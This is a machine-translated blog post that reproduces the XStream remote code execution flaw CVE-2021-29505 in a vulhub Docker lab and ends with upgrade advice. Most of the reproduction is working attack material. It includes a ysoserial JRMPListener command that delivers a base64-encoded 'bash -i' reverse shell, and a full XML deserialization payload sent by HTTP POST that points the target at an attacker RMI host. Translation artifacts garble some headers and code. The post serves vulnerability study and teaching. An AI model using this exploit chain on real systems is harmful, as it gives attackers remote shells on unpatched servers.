XStream Remote Code Execution (CVE-2021-29505)

I. Introduction and description

XStream is an OXMapping technology, which is a framework for processing XML file serialization. When serializing Javabeans or deserializing XML files, it does not need other auxiliary classes and mapping files, making XML serialization no longer tedious. An attacker can execute arbitrary code loaded from a remote server by manipulating the processed input stream and replacing or injecting objects.

Ii. Impact Version:

XStream < = 1.4.16

Iii. Environment Building:

https://raw.githubusercontent.com/vulhub/vulhub/master/xstream/CVE-2021-29505/docker-compose.yml
Copy the code

File: docker – compose. Yml

Version: '2' Services: Web: image: Vulhub /xstream:1.4.16 ports: - "8080:8080"Copy the code

docker-compose up -d

The mirror has been started:

Access the address: http://192.168.0.106:8080/

4. Recurrence of vulnerability

Start the service:

Rebound targets require Base64 encryption:

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1098 CommonsCollections6 "bash -c {echo,L2Jpbi9iYxxxxxxxxPiYx}|{base64,-d}|{bash,-i}"
Copy the code

Screenshot of execution process:

Perform poc:

Get bounce shell:

Detailed packet:

POST/HTTP/1.1 Host: 192.168.0.106:8080 User-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; The rv: 88.0) Gecko / 20100101 Firefox 88.0 / Accept: text/HTML, application/XHTML + XML, application/XML. Q = 0.9, image/webp, * / *; Q = 0.8 Accept - Language: useful - CN, useful; Q = 0.8, useful - TW; Q = 0.7, useful - HK; Q = 0.5, en - US; Q = 0.3, en. Q =0.2 Connection: keep-alive upgrade-insecure -Requests: 1 Content-type: application/ XML content-Length: 3115 <java.util.PriorityQueue serialization='custom'> <unserializable-parents/> <java.util.PriorityQueue> <default> <size>2</size> </default> <int>3</int> <javax.naming.ldap.Rdn_-RdnEntry> <type>12345</type> <value class='com.sun.org.apache.xpath.internal.objects.XString'> <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj> </value> </javax.naming.ldap.Rdn_-RdnEntry> <javax.naming.ldap.Rdn_-RdnEntry> <type>12345</type> <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'> <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'> <parsedMessage>true</parsedMessage> <soapVersion>SOAP_11</soapVersion> <bodyParts/> <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'> <attachmentsInitialized>false</attachmentsInitialized> <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'> <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'> <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'> <names> <string>aa</string> <string>aa</string> </names> <ctx> <environment/> <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'> < Java rmi. Server. RemoteObject > < string > UnicastRef < / string > < string > 192.168.0.102 < / string > < int > 1098 < / int > < long > 0 < / long >  <int>0</int> <long>0</long> <short>0</short> <boolean>false</boolean> </java.rmi.server.RemoteObject> </registry> <host>192.168.0.102</host> <port>1098</port> </ CTX > </ runtime > </nullIter> </sm> </message> </value> </javax.naming.ldap.Rdn_-RdnEntry> </java.util.PriorityQueue> </java.util.PriorityQueue>Copy the code

Five, vulnerability repair:

Upgrade XStream to version 1.4.17 or above. (Replace the older version of XStream in Maven’s /pom.xml)

< the dependency > < groupId > com. Thoughtworks. Xstream < / groupId > < artifactId > xstream < / artifactId > < version > 1.4.17 < / version > </dependency>Copy the code

Reference:

Mp.weixin.qq.com/s/dh7Ewg7Pp…

Blog.csdn.net/weixin\_457…

Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!

If the content of this article infringes on your business or has other impact, please contact the author to delete.

Disclaimer: Copyright belongs to the author. Commercial reprint please contact the author for authorization, non-commercial reprint please indicate the source.

Subscribe for more revisited articles and study notes

thelostworld

Safe road, side by side with you !!!!

Personal knowledge: www.zhihu.com/people/fu-w…

Brief personal book: www.jianshu.com/u/bf0e38a8d…

Personal CSDN: blog.csdn.net/qq\_3760279…

Personal blog garden: www.cnblogs.com/thelostworl…

FREEBUF homepage: www.freebuf.com/author/thel…

Language finches blog homepage: www.yuque.com/thelostworl…

Welcome to add the author of this public account to communicate on wechat. Please note the “public account” when adding.